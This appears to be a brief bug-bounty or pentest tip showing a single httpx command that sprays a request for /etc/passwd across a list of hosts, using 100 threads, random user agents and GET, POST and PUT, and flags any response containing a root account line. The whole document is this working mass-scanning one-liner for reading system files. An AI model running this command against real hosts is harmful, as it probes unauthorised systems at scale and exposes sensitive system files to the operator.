httpx trick to test one specific payload against a large number of hosts
httpx -l http.txt -paths /etc/passwd -threads 100 -random-agent -x GET,POST,PUT -title -follow-redirects -mc 200 -match-regex "root:[x*]:0:0:"
Last updated 3 months ago